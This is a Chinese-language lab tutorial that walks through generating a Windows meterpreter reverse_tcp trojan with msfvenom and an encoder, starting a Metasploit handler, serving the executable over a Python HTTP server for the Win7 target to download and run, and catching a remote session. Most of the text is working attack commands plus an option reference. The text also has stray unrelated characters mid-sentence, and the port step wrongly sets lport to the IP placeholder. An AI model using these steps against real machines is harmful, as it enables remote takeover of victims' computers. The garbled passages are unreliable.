環(huán)境:
攻擊機:kali 2020.1b
靶機:win7 32位
1.利用metasploit生成一個木馬。
利用msfvenom生成一個簡單的windows木馬
命令:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=listen_ip LPORT=listen_port -b"\x00" -e x86/shikata_ga_nai -f exe > msf.exe
mvfvenom命令行選項
Option:
-p, --payload <payload> 指定需要使用的payload(攻擊荷載)。如果需要使用自定義的payload,請使用'-'或者stdin指定
-l, --list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: payloads, encoders, nops, all
-n, --nopsled <length> 為payload預先指定一個NOP滑動長度
-f, --format <format> 指定輸出格式 (使用 --help-formats 來獲取msf支持的輸出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(編碼器)
-a, --arch <architecture> 指定payload的目標架構
--platform <platform> 指定payload的目標平臺
-s, --space <length> 設定有效攻擊荷載的最大長度
-b, --bad-chars <list> 設定規(guī)避字符集葡粒,比如: '\x00\xff'
-i, --iterations <count> 指定payload的編碼次數(shù)
-c, --add-code <path> 指定一個附加的win32 shellcode文件
-x, --template <path> 指定一個自定義的可執(zhí)行文件作為模板
-k, --keep 保護模板程序的動作,注入的payload作為一個新的進程運行
--payload-options 列舉payload的標準選項
-o, --out <path> 保存payload
-v, --var-name <name> 指定一個自定義的變量炕檩,以確定輸出格式
--shellest 最小化生成payload
-h, --help 查看幫助選項
--help-formats 查看msf支持的輸出格式列表
所以上面生成木馬的命令意思是:生成一個windows 32位經(jīng)過編碼的木馬留攒,監(jiān)聽IP和端口為你msf監(jiān)聽的IP和端口,且過濾了\x00
運行該命令爷肝,是用ls查看文件猾浦,msf.exe已經(jīng)生成
2.開啟msf監(jiān)聽
msf> use exploit/multi/handler
使用handler模塊
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
設置監(jiān)聽payload,和生成木馬的payload一樣
msf exploit(handler)> set lhost listen_ip
設置監(jiān)聽IP
msf exploit(handler)> set lport listen_ip
設置監(jiān)聽端口
msf exploit(handler)>show options
查看配置信息灯抛,也可以使用info進行查看該模塊的詳細信息
msf exploit(handler)>exploit
執(zhí)行該模塊
3.傳遞木馬
在kali里面使用python簡單開啟一個http server
root@kali:~# python -m SimpleHTTPServer 888
win7靶機訪問kali 888端口進行下載msf.exe程序金赦,并運行
kali接收到一個session
使用 sessions 查看,此時已經(jīng)獲取到一個低權限的session对嚼,下一階段進行權限的提升夹抗。